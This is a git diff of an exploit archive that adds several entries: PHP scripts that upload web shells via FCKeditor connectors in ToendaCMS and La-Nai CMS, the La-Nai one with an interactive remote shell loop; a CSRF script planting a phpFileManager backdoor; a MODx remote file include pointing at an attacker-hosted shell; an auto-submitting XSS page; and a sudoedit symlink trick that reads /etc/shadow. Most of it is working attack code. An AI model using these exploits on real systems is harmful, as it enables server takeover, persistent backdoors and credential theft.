+++ b/platforms/asp/webapps/23005.txt
@@ -1,15 +1,25 @@
 - Title: FCKEditor 2.6.8 ASP Version File Upload Protection bypass
 - Credit goes to: Mostafa Azizi, Soroush Dalili
-- Link:http://sourceforge.net/projects/fckeditor/files/FCKeditor/
+- Link: http://sourceforge.net/projects/fckeditor/files/FCKeditor/
 - Description:
 There is no validation on the extensions when FCKEditor 2.6.8 ASP version is 
 dealing with the duplicate files. As a result, it is possible to bypass 
 the protection and upload a file with any extension.
+
 - Reference: http://soroush.secproject.com/blog/2012/11/file-in-the-hole/
 - Solution: Please check the provided reference or the vendor website.
+- PoC: http://www.youtube.com/v/1VpxlJ5jLO8?version=3&hl=en_US&rel=0&vq=hd720
+
+Duplicate files do not have proper validation on their extensions.
+
+As a result, it is possible to upload any file with any extension on the server by using Null Character.
+
+Applications on IIS6 can also use "file.asp;gif" pattern.
+- Solution: In "config.asp", wherever you have: ConfigAllowedExtensions.Add "File","EXTENSION HERE" Change it to: ConfigAllowedExtensions.Add "File","^(Extensions HERE)$"
+- Vulnerability: Vulnerable File: commands.asp Function: FileUpload() Vulnerable Code: sFileName = RemoveExtension( sOriginalFileName ) & "(" & iCounter & ")." & sExtension
+
+
 
-- PoC:http://www.youtube.com/v/1VpxlJ5jLO8?version=3&hl=en_US&rel=0&vq=hd720
-"
 
 Note: Quick patch for FCKEditor 2.6.8 File Upload Bypass:
 
diff --git a/platforms/linux/local/37710.txt b/platforms/linux/local/37710.txt
new file mode 100755
index 000000000..6c5e1b9d0
--- /dev/null
+++ b/platforms/linux/local/37710.txt
@@ -0,0 +1,36 @@
+# Exploit Title: sudo -e - a.k.a. sudoedit -  unauthorized privilege escalation
+# Date: 07-23-2015
+# Exploit Author: Daniel Svartman
+# Version: Sudo <=1.8.14
+# Tested on: RHEL 5/6/7 and Ubuntu (all versions)
+# CVE: CVE-2015-5602.
+
+Hello,
+
+I found a security bug in sudo (checked in the latest versions of sudo
+running on RHEL and ubuntu) when a user is granted with root access to
+modify a particular file that could be located in a subset of directories.
+
+It seems that sudoedit does not check the full path if a wildcard is used
+twice (e.g. /home/*/*/file.txt), allowing a malicious user to replace the
+file.txt real file with a symbolic link to a different location (e.g.
+/etc/shadow).
+
+I was able to perform such redirect and retrieve the data from the
+/etc/shadow file.
+
+In order for you to replicate this, you should configure the following line
+in your /etc/sudoers file:
+
+<user_to_grant_priv> ALL=(root) NOPASSWD: sudoedit /home/*/*/test.txt
+
+Then, logged as that user, create a subdirectory within its home folder
+(e.g. /home/<user_to_grant_priv>/newdir) and later create a symbolic link
+inside the new folder named test.txt pointing to /etc/shadow.
+
+When you run sudoedit /home/<user_to_grant_priv>/newdir/test.txt you will
+be allowed to access the /etc/shadow even if have not been granted with
+such access in the sudoers file.
+
+I checked this against fixed directories and files (not using a wildcard)
+and it does work with symbolic links created under the /home folder.
\ No newline at end of file
diff --git a/platforms/php/webapps/2035.php b/platforms/php/webapps/2035.php
index 9a9dc970e..8ec2d6f9d 100755
--- a/platforms/php/webapps/2035.php
+++ b/platforms/php/webapps/2035.php
@@ -1,139 +1,139 @@
-#!/usr/bin/php -q -d short_open_tag=on
-<?
-echo "ToendaCMS <= 1.0.0 Shizouka stable 'F(u)CKeditor' remote commands execution\n";
-echo "by rgod rgod@autistici.org\n";
-echo "site: http://retrogod.altervista.org\n";
-echo "dork: \"toendaCMS is Free Software released under the GNU/GPL License.\" | \"powered by toendaCMS\" -inurl:demo\n\n";
-
-//works regardless of any php.ini settings,
-
-
-if ($argc<4) {
-echo "Usage: php ".$argv[0]." host path cmd OPTIONS\n";
-echo "host:      target server (ip/hostname)\n";
-echo "path:      path to toendacms\n";
-echo "cmd:       a shell command\n";
-echo "Options:\n";
-echo "   -p[port]:    specify a port other than 80\n";
-echo "   -P[ip:port]: specify a proxy\n";
-echo "Example:\n";
-echo "php ".$argv[0]." localhost /cms/ ls -la\n";
-die;
-}
-error_reporting(0);
-ini_set("max_execution_time",0);
-ini_set("default_socket_timeout",5);
-
-function quick_dump($string)
-{
-  $result='';$exa='';$cont=0;
-  for ($i=0; $i<=strlen($string)-1; $i++)
-  {
-   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
-   {$result.="  .";}
-   else
-   {$result.="  ".$string[$i];}
-   if (strlen(dechex(ord($string[$i])))==2)
-   {$exa.=" ".dechex(ord($string[$i]));}
-   else
-   {$exa.=" 0".dechex(ord($string[$i]));}
-   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
-  }
- return $exa."\r\n".$result;
-}
-$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
-function sendpacketii($packet)
-{
-  global $proxy, $host, $port, $html, $proxy_regex;
-  if ($proxy=='') {
-    $ock=fsockopen(gethostbyname($host),$port);
-    if (!$ock) {
-      echo 'No response from '.$host.':'.$port; die;
-    }
-  }
-  else {
-	$c = preg_match($proxy_regex,$proxy);
-    if (!$c) {
-      echo 'Not a valid proxy...';die;
-    }
-    $parts=explode(':',$proxy);
-    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
-    $ock=fsockopen($parts[0],$parts[1]);
-    if (!$ock) {
-      echo 'No response from proxy...';die;
-	}
-  }
-  fputs($ock,$packet);
-  if ($proxy=='') {
-    $html='';
-    while (!feof($ock)) {
-      $html.=fgets($ock);
-    }
-  }
-  else {
-    $html='';
-    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
-      $html.=fread($ock,1);
-    }
-  }
-  fclose($ock);
-  #debug
-  #echo "\r\n".$html;
-}
-
-$host=$argv[1];
-$path=$argv[2];
-$port=80;
-$proxy="";
-$cmd="";
-for ($i=3; $i<=$argc-1; $i++){
-$temp=$argv[$i][0].$argv[$i][1];
-if (($temp<>"-p") and ($temp<>"-P"))
-{$cmd.=" ".$argv[$i];}
-if ($temp=="-p")
-{
-  $port=str_replace("-p","",$argv[$i]);
-}
-if ($temp=="-P")
-{
-  $proxy=str_replace("-P","",$argv[$i]);
-}
-}
-
-if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
-if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
-
-$shell="<?php echo chr(72).\"i Master!\";if(get_magic_quotes_gpc()){\$_COOKIE[\"cmd\"]=stripslashes(\$_COOKIE[\"cmd\"]);}";
-$shell.="ini_set(\"max_execution_time\",0);error_reporting(0);";
-$shell.="echo \"*delim*\";passthru(\$_COOKIE[\"cmd\"]);?>";
-$allowed_extensions = array("zip","doc","xls","pdf","rtf","csv","jpg","gif","jpeg","png","avi","mpg","mpeg","swf","fla");
-for ($i=0; $i<=count($allowed_extensions)-1; $i++){
-$filename="suntzu.php.".$allowed_extensions[$i];
-$data="-----------------------------7d529a1d23092a\r\n";
-$data.="Content-Disposition: form-data; name=\"NewFile\"; filename=\"$filename\"\r\n";
-$data.="Content-Type:\r\n\r\n";
-$data.="$shell\r\n";
-$data.="-----------------------------7d529a1d23092a--\r\n";
-$packet="POST ".$p."engine/js/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=%2f HTTP/1.0\r\n";
-$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d529a1d23092a\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Content-Length: ".strlen($data)."\r\n";
-$packet.="Connection: Close\r\n\r\n";
-$packet.=$data;
-sendpacketii($packet);
-//echo $html;
-$packet="GET ".$p."data/images/File/".$filename." HTTP/1.0\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Cookie: cmd=".$cmd."\r\n";
-$packet.="Connection: Close\r\n\r\n";
-sendpacketii($packet);
-//echo $html;
-if (eregi("Hi Master!",$html)){
-$temp=explode("*delim*",$html);
-die($temp[1]);}
-}
-//if you are here...
-echo "Exploit failed...";
-?>
-
-# milw0rm.com [2006-07-18]
+#!/usr/bin/php -q -d short_open_tag=on
+<?
+echo "ToendaCMS <= 1.0.0 Shizouka stable 'F(u)CKeditor' remote commands execution\n";
+echo "by rgod rgod@autistici.org\n";
+echo "site: http://retrogod.altervista.org\n";
+echo "dork: \"toendaCMS is Free Software released under the GNU/GPL License.\" | \"powered by toendaCMS\" -inurl:demo\n\n";
+
+//works regardless of any php.ini settings,
+
+
+if ($argc<4) {
+echo "Usage: php ".$argv[0]." host path cmd OPTIONS\n";
+echo "host:      target server (ip/hostname)\n";
+echo "path:      path to toendacms\n";
+echo "cmd:       a shell command\n";
+echo "Options:\n";
+echo "   -p[port]:    specify a port other than 80\n";
+echo "   -P[ip:port]: specify a proxy\n";
+echo "Example:\n";
+echo "php ".$argv[0]." localhost /cms/ ls -la\n";
+die;
+}
+error_reporting(0);
+ini_set("max_execution_time",0);
+ini_set("default_socket_timeout",5);
+
+function quick_dump($string)
+{
+  $result='';$exa='';$cont=0;
+  for ($i=0; $i<=strlen($string)-1; $i++)
+  {
+   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
+   {$result.="  .";}
+   else
+   {$result.="  ".$string[$i];}
+   if (strlen(dechex(ord($string[$i])))==2)
+   {$exa.=" ".dechex(ord($string[$i]));}
+   else
+   {$exa.=" 0".dechex(ord($string[$i]));}
+   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
+  }
+ return $exa."\r\n".$result;
+}
+$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
+function sendpacketii($packet)
+{
+  global $proxy, $host, $port, $html, $proxy_regex;
+  if ($proxy=='') {
+    $ock=fsockopen(gethostbyname($host),$port);
+    if (!$ock) {
+      echo 'No response from '.$host.':'.$port; die;
+    }
+  }
+  else {
+	$c = preg_match($proxy_regex,$proxy);
+    if (!$c) {
+      echo 'Not a valid proxy...';die;
+    }
+    $parts=explode(':',$proxy);
+    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
+    $ock=fsockopen($parts[0],$parts[1]);
+    if (!$ock) {
+      echo 'No response from proxy...';die;
+	}
+  }
+  fputs($ock,$packet);
+  if ($proxy=='') {
+    $html='';
+    while (!feof($ock)) {
+      $html.=fgets($ock);
+    }
+  }
+  else {
+    $html='';
+    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
+      $html.=fread($ock,1);
+    }
+  }
+  fclose($ock);
+  #debug
+  #echo "\r\n".$html;
+}
+
+$host=$argv[1];
+$path=$argv[2];
+$port=80;
+$proxy="";
+$cmd="";
+for ($i=3; $i<=$argc-1; $i++){
+$temp=$argv[$i][0].$argv[$i][1];
+if (($temp<>"-p") and ($temp<>"-P"))
+{$cmd.=" ".$argv[$i];}
+if ($temp=="-p")
+{
+  $port=str_replace("-p","",$argv[$i]);
+}
+if ($temp=="-P")
+{
+  $proxy=str_replace("-P","",$argv[$i]);
+}
+}
+
+if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
+if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
+
+$shell="<?php echo chr(72).\"i Master!\";if(get_magic_quotes_gpc()){\$_COOKIE[\"cmd\"]=stripslashes(\$_COOKIE[\"cmd\"]);}";
+$shell.="ini_set(\"max_execution_time\",0);error_reporting(0);";
+$shell.="echo \"*delim*\";passthru(\$_COOKIE[\"cmd\"]);?>";
+$allowed_extensions = array("zip","doc","xls","pdf","rtf","csv","jpg","gif","jpeg","png","avi","mpg","mpeg","swf","fla");
+for ($i=0; $i<=count($allowed_extensions)-1; $i++){
+$filename="suntzu.php.".$allowed_extensions[$i];
+$data="-----------------------------7d529a1d23092a\r\n";
+$data.="Content-Disposition: form-data; name=\"NewFile\"; filename=\"$filename\"\r\n";
+$data.="Content-Type:\r\n\r\n";
+$data.="$shell\r\n";
+$data.="-----------------------------7d529a1d23092a--\r\n";
+$packet="POST ".$p."engine/js/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=%2f HTTP/1.0\r\n";
+$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d529a1d23092a\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Content-Length: ".strlen($data)."\r\n";
+$packet.="Connection: Close\r\n\r\n";
+$packet.=$data;
+sendpacketii($packet);
+//echo $html;
+$packet="GET ".$p."data/images/File/".$filename." HTTP/1.0\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Cookie: cmd=".$cmd."\r\n";
+$packet.="Connection: Close\r\n\r\n";
+sendpacketii($packet);
+//echo $html;
+if (eregi("Hi Master!",$html)){
+$temp=explode("*delim*",$html);
+die($temp[1]);}
+}
+//if you are here...
+echo "Exploit failed...";
+?>
+
+# milw0rm.com [2006-07-18]
diff --git a/platforms/php/webapps/2706.txt b/platforms/php/webapps/2706.txt
index e6c975a2a..90e1e8ad6 100755
--- a/platforms/php/webapps/2706.txt
+++ b/platforms/php/webapps/2706.txt
@@ -1,26 +1,26 @@
-+-------------------------------------------------------------------------------------------
-+ MODx CMS 0.9.2.1 (base_path) Remote File Include Vulnerability
-+-------------------------------------------------------------------------------------------
-+ Affected Software .: MODx CMS 0.9.2.1
-+ Vendor ............: http://modxcms.com/
-+ Download ..........: http://modxcms.com/downloads.html
-+ Description .......: "MODx is an open source PHP Application Framework that helps you take control of your online content."
-+ Dork ..............: "powered by MODx"
-+ Class .............: Remote File Inclusion
-+ Risk ..............: High (Remote File Execution)
-+ Found By ..........: nuffsaid <nuffsaid[at]newbslove.us>
-+-------------------------------------------------------------------------------------------
-+ Details:
-+ MODx CMS manager/media/browser/mcpuk/connectors/php/commands/thumbnail.php does not initialize
-+ the $base_path variable before using it to include files, assuming register_globals = on,
-+ we can intialize the variable in a query string and include a remote file of our choice.
-+ 
-+ Vulnerable Code:
-+ manager/media/browser/mcpuk/connectors/php/commands/thumbnail.php, line(s) 24:
-+ -> include $base_path."manager/media/browser/mcpuk/connectors/php/Commands/helpers/iconlookup.php";
-+
-+ Proof Of Concept:
-+ http://[target]/[path]/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://evilsite.com/shell.php?
-+-------------------------------------------------------------------------------------------
-
-# milw0rm.com [2006-11-03]
++-------------------------------------------------------------------------------------------
++ MODx CMS 0.9.2.1 (base_path) Remote File Include Vulnerability
++-------------------------------------------------------------------------------------------
++ Affected Software .: MODx CMS 0.9.2.1
++ Vendor ............: http://modxcms.com/
++ Download ..........: http://modxcms.com/downloads.html
++ Description .......: "MODx is an open source PHP Application Framework that helps you take control of your online content."
++ Dork ..............: "powered by MODx"
++ Class .............: Remote File Inclusion
++ Risk ..............: High (Remote File Execution)
++ Found By ..........: nuffsaid <nuffsaid[at]newbslove.us>
++-------------------------------------------------------------------------------------------
++ Details:
++ MODx CMS manager/media/browser/mcpuk/connectors/php/commands/thumbnail.php does not initialize
++ the $base_path variable before using it to include files, assuming register_globals = on,
++ we can intialize the variable in a query string and include a remote file of our choice.
++ 
++ Vulnerable Code:
++ manager/media/browser/mcpuk/connectors/php/commands/thumbnail.php, line(s) 24:
++ -> include $base_path."manager/media/browser/mcpuk/connectors/php/Commands/helpers/iconlookup.php";
++
++ Proof Of Concept:
++ http://[target]/[path]/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://evilsite.com/shell.php?
++-------------------------------------------------------------------------------------------
+
+# milw0rm.com [2006-11-03]
diff --git a/platforms/php/webapps/37457.html b/platforms/php/webapps/37457.html
index 59f016edb..efa176ac9 100755
--- a/platforms/php/webapps/37457.html
+++ b/platforms/php/webapps/37457.html
@@ -6,5 +6,5 @@ An attacker may leverage this issue to execute arbitrary script code in the brow
 
 FCKEditor 2.6.7 is vulnerable; prior versions may also be affected. 
 
-html> <body> <iframe style="width: 1px; height: 1px; visibility: hidden" name="hidden"></iframe> <form method="post" name="sender" action="http://www.example.com//fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php"; target="hidden"> <input type="hidden" name="textinputs[]" value='");alert("THIS SITE IS XSS VULNERABLE!");</script><!--' /> </form> </body> <script>document.sender.submit(); </script> </html>
+<html> <body> <iframe style="width: 1px; height: 1px; visibility: hidden" name="hidden"></iframe> <form method="post" name="sender" action="http://www.example.com/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php"; target="hidden"> <input type="hidden" name="textinputs[]" value='");alert("THIS SITE IS XSS VULNERABLE!");</script><!--' /> </form> </body> <script>document.sender.submit(); </script> </html>
 
diff --git a/platforms/php/webapps/37712.txt b/platforms/php/webapps/37712.txt
new file mode 100755
index 000000000..9cfe22986
--- /dev/null
+++ b/platforms/php/webapps/37712.txt
@@ -0,0 +1,125 @@
+# Exploit Title: CSRF Remote Backdoor Shell
+# Google Dork: intitle: CSRF Remote Backdoor Shell
+# Date: 2015-07-29
+# Exploit Author:  John Page ( hyp3rlinx )
+# Website: hyp3rlinx.altervista.org
+# Vendor Homepage: phpfm.sourceforge.net
+# Software Link:  phpfm.sourceforge.net
+# Version: 0.9.8
+# Tested on: windows 7 SP1
+# Category: Webapps
+
+
+
+
+Vendor:
+================================
+phpfm.sourceforge.net
+
+
+
+Product:
+============================
+phpFileManager version 0.9.8
+
+
+Vulnerability Type:
+==========================
+CSRF Remote Backdoor Shell
+
+
+
+CVE Reference:
+==============
+N/A
+
+
+
+Advisory Information:
+========================================
+CSRF Remote Backdoor Shell Vulnerability
+
+
+
+
+Vulnerability Details:
+=======================================================================
+PHP File Manager is vulnerable to creation of arbitrary files on server
+via CSRF which we can use to create remote backdoor shell access if victim
+clicks our malicious linx or visits our malicious webpages.
+
+To create backdoor shell we will need to execute two POST requests
+1- to create PHP backdoor shell 666.php
+2- inject code and save to the backdoor we just created
+
+e.g.
+https://localhost/phpFileManager-0.9.8/666.php?cmd=[ OS command ]
+
+
+Exploit code(s):
+===============
+
+<script>
+var
+scripto="frame=3&action=2&dir_dest=2&chmod_arg=&cmd_arg=666.php&current_dir=&selected_dir_list=&selected_file_list="
+blasphemer(scripto)
+
+var
+maliciouso="action=7&save_file=1&current_dir=.&filename=666.php&file_data='<?php+echo+'backdoor
+shell by hyp3rlinx......';+exec($_GET['cmd']);+?>"
+blasphemer(maliciouso)
+
+function blasphemer(payload){
+ var xhr=new XMLHttpRequest()
+ xhr.open('POST',"https://localhost/phpFileManager-0.9.8/index.php", true)
+ xhr.setRequestHeader("content-type", "application/x-www-form-urlencoded")
+ xhr.send(payload)
+}
+</script>
+
+
+
+Disclosure Timeline:
+=========================================================
+Vendor Notification: July 28, 2015
+July 29, 2015 : Public Disclosure
+
+
+
+Severity Level:
+=========================================================
+High
+
+
+
+Description:
+==========================================================
+
+
+Request Method(s):              [+] POST
+
+
+Vulnerable Product:             [+] phpFileManager 0.9.8
+
+
+Vulnerable Parameter(s):        [+] action, cmd_arg, file_data, chmod_arg,
+save_file
+
+
+Affected Area(s):               [+] Web Server
+
+
+===========================================================
+
+[+] Disclaimer
+Permission is hereby granted for the redistribution of this advisory,
+provided that it is not altered except by reformatting it, and that due
+credit is given. Permission is explicitly given for insertion in
+vulnerability databases and similar, provided that due credit is given to
+the author.
+The author is not responsible for any misuse of the information contained
+herein and prohibits any malicious use of all security related information
+or exploits by the author or elsewhere.
+
+
+by hyp3rlinx
diff --git a/platforms/php/webapps/37715.txt b/platforms/php/webapps/37715.txt
new file mode 100755
index 000000000..7436bb8a5
--- /dev/null
+++ b/platforms/php/webapps/37715.txt
@@ -0,0 +1,27 @@
+# Exploit Title: Tendoo CMS Stored And Reflected Xss Vulnerability
+# Google Dork: N/A
+# Date: 28/7/2015
+# Exploit Author: Arash Khazaei
+# Vendor Homepage: http://tendoo.org/
+# Software Link: http://sourceforge.net/projects/tendoo-cms/
+# Version: 1.3
+# Tested on: Kali , Windows
+# CVE : N/A
+# Contact : 0xclay@gmail.com
+
+######################
+Introduction :
+a Stored And a Reflected XSS Vulnerability In Profile Area In Tendoo CMS
+Make CMS Vulnerable And Can Be Used For Stealing Admin Cookies And ....... .
+######################
+
+Stored Xss In http://localhost/tendoo/index.php/account/update In First
+Name and Last Name Inputs
+Excute Java Script Codes And If Admin Or Any Body Come In Attacker Profile
+When First Name And Last Name Loads
+JavaScripts Code Will Be Excuted
+POC :
+
+https://i.leetfil.es/e992ad2d.jpg
+
+Discovered By Arash Khazaei
diff --git a/platforms/php/webapps/5618.txt b/platforms/php/webapps/5618.txt
index 368bc9743..845d00007 100755
--- a/platforms/php/webapps/5618.txt
+++ b/platforms/php/webapps/5618.txt
@@ -1,155 +1,155 @@
-<?php
-
-/*
-	--------------------------------------------------------------
-	La-Nai CMS <= 1.2.16 (fckeditor) Arbitrary File Upload Exploit
-	--------------------------------------------------------------
-	
-	author...: EgiX
-	mail.....: n0b0d13s[at]gmail[dot]com
-	
-	link.....: http://sourceforge.net/projects/la-nai/
-
-	[-] vulnerable code in /include/fckeditor/editor/filemanager/upload/php/upload.php
-	
-	41.	// Get the posted file.
-	42.	$oFile = $_FILES['NewFile'] ;
-	43.	
-	44.	// Get the uploaded file name and extension.
-	45.	$sFileName = $oFile['name'] ;
-	46.	$sOriginalFileName = $sFileName ;
-	47.	$sExtension = substr( $sFileName, ( strrpos($sFileName, '.') + 1 ) ) ;
-	48.	$sExtension = strtolower( $sExtension ) ;
-	49.	
-	50.	// The the file type (from the QueryString, by default 'File').
-	51.	$sType = isset( $_GET['Type'] ) ? $_GET['Type'] : 'File' ;
-	52.	
-	53.	// Check if it is an allowed type.
-	54.	if ( !in_array( $sType, array('File','Image','Flash','Media') ) )
-	55.	    SendResults( 1, '', '', 'Invalid type specified' ) ;
-	56.	
-	57.	// Get the allowed and denied extensions arrays.
-	58.	$arAllowed	= $Config['AllowedExtensions'][$sType] ;
-	59.	$arDenied	= $Config['DeniedExtensions'][$sType] ;
-	60.	
-	61.	// Check if it is an allowed extension.
-	62.	if ( ( count($arAllowed) > 0 && !in_array( $sExtension, $arAllowed ) ) || ( count($arDenied) > 0 && in_array( $sExtension, $arDenied ) ) )
-	63.		SendResults( '202' ) ;
-	64.	
-	65.	$sErrorNumber	= '0' ;
-	66.	$sFileUrl		= '' ;
-	67.	
-	68.	// Initializes the counter used to rename the file, if another one with the same name already exists.
-	69.	$iCounter = 0 ;
-	70.	
-	71.	// The the target directory.
-	72.	if ( isset( $Config['UserFilesAbsolutePath'] ) )
-	73.		$sServerDir = $Config['UserFilesAbsolutePath'] ;
-	74.	else 
-	75.		//$sServerDir = GetRootPath() . $Config["UserFilesPath"] ;
-	76.		$sServerDir = $Config["UserFilesPath"] ;
-	77.	
-	78.	while ( true )
-	79.	{
-	80.		// Compose the file path.
-	81.		$sFilePath = $sServerDir . $sFileName ;
-	82.	
-	83.		// If a file with that name already exists.
-	84.		if ( is_file( $sFilePath ) )
-	85.		{
-	86.			$iCounter++ ;
-	87.			$sFileName = RemoveExtension( $sOriginalFileName ) . '(' . $iCounter . ').' . $sExtension ;
-	88.			$sErrorNumber = '201' ;
-	89.		}
-	90.		else
-	91.		{
-	92.			move_uploaded_file( $oFile['tmp_name'], $sFilePath ) ;
-	93.	
-	94.			if ( is_file( $sFilePath ) )
-	95.			{
-	96.				$oldumask = umask(0) ;
-	97.				chmod( $sFilePath, 0777 ) ;
-	98.				umask( $oldumask ) ;
-	99.			}
-	100.			
-	101.			$sFileUrl = $Config["UserFilesPath"] . $sFileName ;
-	102.	
-	103.			break ;
-	104.		}
-	
-	with a default configuration of this script, an attacker might be able to upload arbitrary files containing malicious PHP code	
-*/
-
-error_reporting(0);
-set_time_limit(0);
-ini_set("default_socket_timeout", 5);
-
-function http_send($host, $packet)
-{
-	$sock = fsockopen($host, 80);
-	while (!$sock)
-	{
-		print "\n[-] No response from {$host}:80 Trying again...";
-		$sock = fsockopen($host, 80);
-	}
-	fputs($sock, $packet);
-	while (!feof($sock)) $resp .= fread($sock, 1024);
-	fclose($sock);
-	return $resp;
-}
-
-print "\n+------------------------------------------------------------+";
-print "\n| La-Nai CMS <= 1.2.16 Arbitrary File Upload Exploit by EgiX |";
-print "\n+------------------------------------------------------------+\n";
-
-if ($argc < 2)
-{
-	print "\nUsage......: php $argv[0] host path";
-	print "\nExample....: php $argv[0] localhost /lanai-cms/\n";
-	die();
-}
-
-$host = $argv[1];
-$path = $argv[2];
-
-$data  = "--12345\r\n";
-$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"s.php.he.ll\"\r\n";
-$data .= "Content-Type: application/octet-stream\r\n\r\n";
-$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n";
-$data .= "--12345--\r\n";
-
-$packet  = "POST {$path}include/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.0\r\n";
-$packet .= "Host: {$host}\r\n";
-$packet .= "Content-Length: ".strlen($data)."\r\n";
-$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
-$packet .= "Connection: close\r\n\r\n";
-$packet .= $data;
-
-preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html);
-
-if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
-else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n";
-
-define(STDIN, fopen("php://stdin", "r"));
-
-while(1)
-{
-	print "\nlanai-shell# ";
-	$cmd = trim(fgets(STDIN));
-	if ($cmd != "exit")
-	{
-		$packet = "GET {$path}datacenter/media/{$html[3]} HTTP/1.0\r\n";
-		$packet.= "Host: {$host}\r\n";
-		$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
-		$packet.= "Connection: close\r\n\r\n";
-		$output = http_send($host, $packet);
-		if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n");
-		$shell = explode("_code_", $output);
-		print "\n{$shell[1]}";
-	}
-	else break;
-}
-
-?>
-
-# milw0rm.com [2008-05-14]
+<?php
+
+/*
+	--------------------------------------------------------------
+	La-Nai CMS <= 1.2.16 (fckeditor) Arbitrary File Upload Exploit
+	--------------------------------------------------------------
+	
+	author...: EgiX
+	mail.....: n0b0d13s[at]gmail[dot]com
+	
+	link.....: http://sourceforge.net/projects/la-nai/
+
+	[-] vulnerable code in /include/fckeditor/editor/filemanager/upload/php/upload.php
+	
+	41.	// Get the posted file.
+	42.	$oFile = $_FILES['NewFile'] ;
+	43.	
+	44.	// Get the uploaded file name and extension.
+	45.	$sFileName = $oFile['name'] ;
+	46.	$sOriginalFileName = $sFileName ;
+	47.	$sExtension = substr( $sFileName, ( strrpos($sFileName, '.') + 1 ) ) ;
+	48.	$sExtension = strtolower( $sExtension ) ;
+	49.	
+	50.	// The the file type (from the QueryString, by default 'File').
+	51.	$sType = isset( $_GET['Type'] ) ? $_GET['Type'] : 'File' ;
+	52.	
+	53.	// Check if it is an allowed type.
+	54.	if ( !in_array( $sType, array('File','Image','Flash','Media') ) )
+	55.	    SendResults( 1, '', '', 'Invalid type specified' ) ;
+	56.	
+	57.	// Get the allowed and denied extensions arrays.
+	58.	$arAllowed	= $Config['AllowedExtensions'][$sType] ;
+	59.	$arDenied	= $Config['DeniedExtensions'][$sType] ;
+	60.	
+	61.	// Check if it is an allowed extension.
+	62.	if ( ( count($arAllowed) > 0 && !in_array( $sExtension, $arAllowed ) ) || ( count($arDenied) > 0 && in_array( $sExtension, $arDenied ) ) )
+	63.		SendResults( '202' ) ;
+	64.	
+	65.	$sErrorNumber	= '0' ;
+	66.	$sFileUrl		= '' ;
+	67.	
+	68.	// Initializes the counter used to rename the file, if another one with the same name already exists.
+	69.	$iCounter = 0 ;
+	70.	
+	71.	// The the target directory.
+	72.	if ( isset( $Config['UserFilesAbsolutePath'] ) )
+	73.		$sServerDir = $Config['UserFilesAbsolutePath'] ;
+	74.	else 
+	75.		//$sServerDir = GetRootPath() . $Config["UserFilesPath"] ;
+	76.		$sServerDir = $Config["UserFilesPath"] ;
+	77.	
+	78.	while ( true )
+	79.	{
+	80.		// Compose the file path.
+	81.		$sFilePath = $sServerDir . $sFileName ;
+	82.	
+	83.		// If a file with that name already exists.
+	84.		if ( is_file( $sFilePath ) )
+	85.		{
+	86.			$iCounter++ ;
+	87.			$sFileName = RemoveExtension( $sOriginalFileName ) . '(' . $iCounter . ').' . $sExtension ;
+	88.			$sErrorNumber = '201' ;
+	89.		}
+	90.		else
+	91.		{
+	92.			move_uploaded_file( $oFile['tmp_name'], $sFilePath ) ;
+	93.	
+	94.			if ( is_file( $sFilePath ) )
+	95.			{
+	96.				$oldumask = umask(0) ;
+	97.				chmod( $sFilePath, 0777 ) ;
+	98.				umask( $oldumask ) ;
+	99.			}
+	100.			
+	101.			$sFileUrl = $Config["UserFilesPath"] . $sFileName ;
+	102.	
+	103.			break ;
+	104.		}
+	
+	with a default configuration of this script, an attacker might be able to upload arbitrary files containing malicious PHP code	
+*/
+
+error_reporting(0);
+set_time_limit(0);
+ini_set("default_socket_timeout", 5);
+
+function http_send($host, $packet)
+{
+	$sock = fsockopen($host, 80);
+	while (!$sock)
+	{
+		print "\n[-] No response from {$host}:80 Trying again...";
+		$sock = fsockopen($host, 80);
+	}
+	fputs($sock, $packet);
+	while (!feof($sock)) $resp .= fread($sock, 1024);
+	fclose($sock);
+	return $resp;
+}
+
+print "\n+------------------------------------------------------------+";
+print "\n| La-Nai CMS <= 1.2.16 Arbitrary File Upload Exploit by EgiX |";
+print "\n+------------------------------------------------------------+\n";
+
+if ($argc < 2)
+{
